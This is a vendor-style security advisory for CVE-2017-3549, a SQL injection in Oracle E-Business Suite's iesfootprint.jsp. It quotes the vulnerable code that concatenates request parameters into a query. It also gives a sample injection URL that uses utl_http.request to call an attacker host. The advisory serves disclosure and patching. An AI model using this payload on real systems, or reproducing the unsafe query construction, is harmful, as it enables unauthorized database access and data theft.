SQL Injection in E-Business Suite IESFOOTPRINT

Application: Oracle E-Business Suite **Versions Affected:**Oracle EBS 12.2.3 Vendor:Oracle **Bugs:**SQL injection **Reported:**23.12.2016 **Vendor response:**24.12.2016 **Date of Public Advisory:**18.04.2017 **Reference: **Oracle CPU April 2017 Authors: Dmitry Chastuhin (ERPScan)

VULNERABILITY INFORMATION

Class: SQL injection
Impact: read sensitive data, modify or delete data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-3549

CVSS Information

CVSS Base Score v3: 9.1 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	Low (L)
PR: Privileges Required (Level of privileges needed to exploit)	None (N)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Unchanged (U)
C: Impact to Confidentiality	High (H)
I: Impact to Integrity	High (H)
A: Impact to Availability	None (N)

VULNERABILITY DESCRIPTION

The code comprises an SQL statement containing strings that can be altered by an attacker. The manipulated SQL statement can be used then to retrieve additional data from the database or to modify the data without authorization.

VULNERABLE PACKAGES

Oracle EBS 12.2.3

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU April 2017

TECHNICAL DESCRIPTION

Proof of Concept

Vulnerable jsp name is iesfootprint.jsp

deployDate = ((request.getParameter(“deployDate”)) != null) ? request.getParameter(“deployDate”) : “”; responseDate = ((request.getParameter(“responseDate”)) != null) ? request.getParameter(“responseDate”) : “”; dscriptName = ((request.getParameter(“dscript_name”)) != null) ? request.getParameter(“dscript_name”) : “”; dscriptId = ((request.getParameter(“dscriptId”)) != null) ? request.getParameter(“dscriptId”) : “”; %> <% // Process the data based on params if (showGraph) { // Create Query String StringBuffer query = new StringBuffer(“SELECT panel_name, count_panels, avg_time, min_time, max_time, “); query.append(”'”).append(_prompts[10]).append(“'”); query.append(" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = “); query.append(dscriptId); query.append(” AND start_time between “); query.append(”'“).append(deployDate).append(”'“); query.append(” and “); query.append(”'“).append(responseDate).append(”'“); query.append(” GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11"); // Get XMLDocument for the corresponding query and Paint graph try { XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString()); htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

|

deployDate = ((request.getParameter(“deployDate”)) != null) ? request.getParameter(“deployDate”) : “”;

responseDate = ((request.getParameter(“responseDate”)) != null) ? request.getParameter(“responseDate”) : “”;

dscriptName = ((request.getParameter(“dscript_name”)) != null) ? request.getParameter(“dscript_name”) : “”;

dscriptId = ((request.getParameter(“dscriptId”)) != null) ? request.getParameter(“dscriptId”) : “”;

%>

<%

// Process the data based on params

if (showGraph) {

// Create Query String

StringBuffer query = new StringBuffer("SELECT panel_name, count_panels, avg_time, min_time, max_time, ");

query.append(“'”).append(_prompts[10]).append(“'”);

query.append(" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = ");

query.append(dscriptId);

query.append(" AND start_time between ");

query.append(“'”).append(deployDate).append(“'”);

query.append(" and ");

query.append(“'”).append(responseDate).append(“'”);

query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11");

// Get XMLDocument for the corresponding query and Paint graph

try {

XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());

htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);

—|—

Approximate request with SQL injection

http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&amp;dscriptId=11’ AND utl_http.request(‘http://attackers_host/lalal’)=‘1’ GROUP BY panel_name)) –

1

|

http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&amp;dscriptId=11’ AND utl_http.request(‘http://attackers_host/lalal’)=‘1’ GROUP BY panel_name)) –

—|—